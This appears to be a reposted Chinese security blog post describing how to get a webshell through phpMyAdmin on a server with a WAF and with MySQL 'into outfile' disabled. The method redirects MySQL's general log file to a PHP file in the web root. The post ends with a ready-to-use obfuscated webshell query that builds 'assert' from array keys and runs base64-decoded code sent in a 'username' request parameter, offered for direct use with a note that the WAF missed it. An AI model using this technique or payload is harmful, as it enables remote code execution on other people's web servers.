码迷,mamicode.com
首页 > Web开发 > 详细

phpmyadmin新姿势getshell

时间:2017-04-07 00:50:22      阅读:377      评论:0      收藏:0      [点我收藏+]

标签:禁用   src   利用   file   内存   ice   min   也会   方便   

旁白:在一个有WAF、并且mysql中的Into outfile禁用的情况下,我该如何getshell?

作者:倾旋
email:payloads@aliyun.com
投稿联系:service@cora-lab.org

首先环境如下:

 

  • OS:Windows 2003
  • WAF:Safe Dog 4.0正式版
  • phpmyadmin:4.7(许多都可以)
  • Mysql:5.5+
  • PHP:5.3
  • Apache:2.x

目前into outfile已经被禁用,并且WAF也会在写入文件的时候拦截。
那么我们尝试通过一个脑洞大开的方法去getshell。
(必须是mysql root权限)

登录phpmyadmin后,查看全局变量:
找到 general log file

技术分享

这里是存储了每一个sql语句执行的日志(包含SQL语句本身)

但是general log变量必须是ON状态,代表启用。

此时我们把general log开启为ON,然后再去更改general log file的地址为我们的webshell绝对路径。

在每一次更改general log file的时候mysql都会判断日志文件是否存在,如果不存在则会自动创建。

技术分享

此时该文件已经创建,并且文件内容保存了最后一条SQL语句的日志信息。

MySQLa, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
121 Query SHOW GLOBAL VARIABLES WHERE Variable_name="general_log_file"
121 Quit

接下来,我们直接随意查询SQL,每一句都会被写入这个shell.php

技术分享

由于有WAF,我们采用远程包含的形式来运行webshell。
在我们的远程地址里,放置函数名,使服务器端访问它,然后加载到内存,直接去调用此函数,再去接收我们提交的php代码。

技术分享

技术分享

关于菜刀免杀,请看上一篇文章。

下面再附上一个SQL查询免杀shell的语句,方便大家遇到此类情况直接利用:

SELECT "<?php $p = array(‘f‘=>‘a‘,‘pffff‘=>‘s‘,‘e‘=>‘fffff‘,‘lfaaaa‘=>‘r‘,‘nnnnn‘=>‘t‘);$a = array_keys($p);$_=$p[‘pffff‘].$p[‘pffff‘].$a[2];$_= ‘a‘.$_.‘rt‘;$_(base64_decode($_REQUEST[‘username‘]));?>"

技术分享

可见这边并没有拦截:
技术分享

文章就到这里啦,这几天比较忙,都没有怎么更新,感谢大家一直以来的支持!

phpmyadmin新姿势getshell

标签:禁用   src   利用   file   内存   ice   min   也会   方便   

原文地址:http://www.cnblogs.com/test404/p/6676093.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!